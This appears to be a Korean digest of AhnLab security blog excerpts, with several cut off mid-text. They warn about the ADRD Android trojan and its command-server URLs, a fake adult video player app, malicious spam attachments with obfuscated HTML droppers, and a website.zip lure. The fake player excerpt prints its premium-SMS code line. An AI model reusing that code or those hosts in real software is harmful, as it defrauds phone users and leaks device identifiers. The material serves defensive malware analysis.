ahnlab

새로운 안드로이드 트로이목마, ADRD 주의

1. 서 론 해외에서 사용자 정보를 탈취하는 신종 안드로이드 악성코드가 발견되어 관련 내용을 전해드립니다. 2. 악성코드 유포 방법 및 증상 일명 ADRD 라 불리는 해당 악성코드는 “Geimini” 악성코드와 비슷하게 정상 App 에 악성코드를 심어 리패키징 되는 형태로 유포되고 있습니다. 리패키징되는 App 은 S사의 wallpaper 관련 App을 타제품에서도 쓸수 있게끔 포팅한 App으로 개인에 의해 제작된 App입니다. [그림 1. Dandelion Live Wallpaper]   [그림 2. 변조 후 요구되는 시스템 권한] 변조된 App 은 설치시 원래 App의 기능을 수행하면서, 백그라운드로 아래의 동작을 겸합니다. – 특정 URL로 접근 adrd.zt.cw.4 adrd.xiaxiab.com/pic.aspx adrd.taxuan.net/index.aspx – 사용자의 IMEI/IMSI 값 전송 – Alarm 을 이용하여 주기적으로 동작시킴 – 커맨드 서버에서 명령받아 실행될 수 있음 3. 진단현황 Ahnlab V3 mobile 제품군에서는 아래와 같은 진단명으로 진단가능합니다. [진단명] Android-Spyware/Adrd 4. 악성코드 감염 예방법 스마트폰 열풍과 함께…

안드로이드 동영상 플레이어 앱을 위장한 악성 앱 주의요망

1. 서론 성인 동영상 플레이어를 위장하여 특정번호로 SMS 메시지가 전송되어 요금을 과금시키는 안드로이드 악성 어플리케이션(App)이 발견되어 관련 내용을 공유해 드립니다.2. 악성코드 정보 해당 악성 어플리케이션은 2010년 8월 10일 최초 발견되었으며 그 이후 계속해서 변형이 발견되었습니다.  발견 일시  8월 10일  9월 9일  10월 12일  아이콘  어플리케이션 명  MoviePlayer  PornoPlayer  PornoPlayer [표 1] 성인 동영상 플레이어를 위장한 악성 어플리케이션 [그림1] 안드로이드 폰에 설치된 PornoPlayer 어플리케이션 어플리케이션 내부에 아래와 같은 코드가 존재하여 어플리케이션이 설치되면 특정 번호로 SMS 메시지를 보내 요금을 과금시키는 특징이 있습니다.   android.telephony.SmsManager.sendTextMessage(“7132”, 0, “846978”, 0, 0);    * '7132' 번호로 “846978” 이라는 문자메시지를 발송.       아래의 코드들은 전달되는 텍스트만 다를 뿐 동일함.   android.telephony.SmsManager.sendTextMessage(“7132”, 0, “845784”, 0, 0);   android.telephony.SmsManager.sendTextMessage(“7132”, 0, “846996”, 0, 0);   android.telephony.SmsManager.sendTextMessage(“7132”, 0, “844858”,…

[악성스팸메일 주의] “report”, “Delivery Status Notification (Failure)”

“report“, “Delivery Status Notification (Failure)” 제목의 악성 html 파일을 첨부한 스팸메일이 유포중 입니다. 스팸메일 내 본문 내용은 아래와 같습니다. 1. 메일제목   ▶ report Sending my report. Have a great weekend. Cheers 2. 메일제목   ▶ Delivery Status Notification (Failure) Delivery to the following recipient failed permanently: ampoulesvb8@resp-usc.com Technical details of permanent failure: DNS Error: Domain name not found 해당 html들은 악성코드 제작자가 만든 패턴에 의해 인코딩 되어 있습니다. 인코딩을 풀어보면 아래와 같이 웹페이지를 리디렉션하는 디코딩된 결과가 나오게 됩니다.

광고성 html을 가장하여 악성코드를 다운로드하는 스팸메일 (2)

http://core.ahnlab.com/193 상기의 이전 글에서 최근 html 파일을 첨부하거나 html 링크를 삽입한 스팸메일을 통해 악성코드를 다운로드 하는 스팸메일의 형태를 살펴보았습니다.  이어서 난독화된 악성 스크립트를 살펴 보도록 하겠습니다. 상기와 같이 난독화된 악성 스크립트는 악성 스크립트 제작자가 제작한 루틴 및 사용되지 않는 쓰레기 코드로 구성되어 있으며 디코딩 후 실제 악의적인 웹 페이지가 완성이 되게 됩니다.  최종 디코딩된 악성 스크립트는 MDAC[Microsoft Data Access Components], PDF, JAVA 취약점을 이용하여 악성코드를 로컬에 저장하고 실행하게 됩니다.    취약점을 이용한 파일 및 game.exe 파일은 아래와 같은 진단명으로 V3에서 진단/치료가 가능합니다. game.exe  -> Win-Trojan/Agent.26112.RQ Notes10.pdf  -> PDF/Exlpoit Applet10.html  ->HTML/Agent 다음 글에서 다운로드 된 game.exe 파일 실행 시 증상에 대해 살펴보도록 하겠습니다.

website.zip 악성코드를 유포시키는 스팸메일 주의!

최근 수집된 악성코드 유포 스팸메일 중, 첨부파일이 마치 해외보안업체의 바이러스 검사를 통과한 안전한 파일인 것처럼 위장하여 전송되는 스팸메일이 발견되어 안내드립니다.  Re: my website ————————————————————————————————–  Please read the document. website.zip: No virus found Powered by the new Norton OnlineScan Get protected: www.symantec.com 위 그림처럼 website.zip 이 바이러스테스트를 통과한 것처럼 메일을 뿌려, 사용자가 안심하고 실행할 수 있게끔 유도하고 있습니다. website.zip 압축파일 내에 존재하는 파일은 악성코드이므로 절대 첨부파일 실행하지 마시고, 메일 확인 즉시 삭제해주시기 바랍니다. 첨부 파일은 현재 V3 에서 Win32/Virut 으로 진단 및 치료 가능합니다. 항상 아래의 사항을 준수하여 악성코드에 감염되지 않게 예방하시기 바랍니다. 1. 발신인이 불분명한 메일일 경우 가급적 메일을 확인하지 마시기 바랍니다. 2. 안티바이러스(백신) 프로그램을 설치하여 항상 최신 엔진을 유지하며, 실시간 감시 기능을 사용합니다. 3. 메일 내에 포함된 첨부파일에 대해 안티바이러스(백신) 프로그램으로 검사를…